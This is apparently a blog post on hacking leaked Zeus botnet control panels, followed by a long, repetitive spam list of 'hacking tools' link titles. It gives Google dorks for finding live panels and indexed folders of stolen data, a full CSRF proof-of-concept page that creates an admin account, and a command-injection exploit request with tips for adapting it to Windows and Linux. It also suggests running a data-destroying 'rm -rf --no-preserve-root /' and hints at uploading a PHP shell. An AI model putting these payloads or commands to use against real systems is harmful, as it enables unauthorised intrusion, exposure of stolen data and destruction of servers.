Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Related news

1. Hacker Tools Github
2. Pentest Tools Find Subdomains
3. Hack Tools For Mac
4. Top Pentest Tools
5. Hack Tools For Games
6. Tools Used For Hacking
7. Ethical Hacker Tools
8. Hacker Tools Github
9. Hacker Search Tools
10. Hacker Tools Hardware
11. Github Hacking Tools
12. Pentest Tools
13. Nsa Hack Tools Download
14. Hacker Tools List
15. Pentest Tools Android
16. Pentest Tools Android
17. Hacking Tools And Software
18. Hacker Tools Online
19. Hack Tools For Ubuntu
20. Pentest Tools Android
21. Termux Hacking Tools 2019
22. Hacker Techniques Tools And Incident Handling
23. Hack Tools
24. Pentest Tools For Android
25. Hacker Tools 2020
26. How To Make Hacking Tools
27. Hack Tools Download
28. Hack Tool Apk
29. Pentest Tools Kali Linux
30. Hack Tools 2019
31. Hack Tools For Games
32. Hacker Security Tools
33. Hacker
34. Nsa Hacker Tools
35. Pentest Tools Port Scanner
36. Pentest Tools For Android
37. Hacker Tools Hardware
38. Hacking Tools Download
39. Growth Hacker Tools
40. Hacking Tools For Pc
41. Best Pentesting Tools 2018
42. Hacker Tools Windows
43. Hacking Tools For Mac
44. Hacker Tools 2019
45. Hacker Tools Mac
46. Hacker Tools Mac
47. Hacker Tools Linux
48. Hacker Tools Free Download
49. Hacking Tools 2019
50. Game Hacking
51. Hacker Tools Free Download
52. Pentest Recon Tools
53. Best Hacking Tools 2020
54. Hack Tools Online
55. Hackrf Tools
56. Install Pentest Tools Ubuntu
57. Game Hacking
58. Pentest Tools Linux
59. Hacking Tools For Mac
60. Hack Tool Apk No Root
61. Hack Tools 2019
62. Hacks And Tools
63. Hacking Tools Software
64. Termux Hacking Tools 2019
65. Hackers Toolbox
66. Computer Hacker
67. Tools For Hacker
68. Hacking Tools For Windows Free Download
69. Android Hack Tools Github
70. Hacker
71. Hacking Tools Online
72. Pentest Tools Kali Linux
73. Pentest Tools Windows
74. Hack Tool Apk
75. Hacker Security Tools
76. New Hacker Tools
77. Hacking Tools Download
78. Hacking Tools
79. Tools 4 Hack
80. Tools 4 Hack
81. Hacking Tools Free Download
82. Free Pentest Tools For Windows
83. Tools 4 Hack
84. Hack Tools For Ubuntu
85. Hack Tools Pc
86. Beginner Hacker Tools
87. Pentest Automation Tools
88. Hacker Techniques Tools And Incident Handling
89. Hack Apps
90. Hacker
91. Hacker Tools
92. Physical Pentest Tools
93. Hack Tools Online
94. Hack Tools Pc
95. Github Hacking Tools
96. Black Hat Hacker Tools
97. Pentest Tools Url Fuzzer
98. Pentest Automation Tools
99. How To Make Hacking Tools
100. Game Hacking
101. Hack Tools
102. Best Hacking Tools 2020
103. Growth Hacker Tools
104. Hacking Tools Download
105. Hack App
106. Pentest Tools For Ubuntu
107. Blackhat Hacker Tools
108. Pentest Tools Subdomain
109. Best Hacking Tools 2020
110. Hacker Tools For Pc
111. Hacking Tools For Windows
112. Hacking Tools For Beginners
113. Android Hack Tools Github
114. Growth Hacker Tools
115. Hacker Tools Mac
116. Hacking Tools
117. Hacking Tools And Software
118. Install Pentest Tools Ubuntu
119. Hacker Tools Software
120. Hacking Tools Github
121. How To Install Pentest Tools In Ubuntu
122. Hacking Tools And Software
123. Hacking Tools Online
124. Hacking Tools Github
125. Hacking Tools For Windows Free Download
126. How To Install Pentest Tools In Ubuntu
127. Growth Hacker Tools
128. Hack Website Online Tool
129. Hacking Tools Pc
130. New Hacker Tools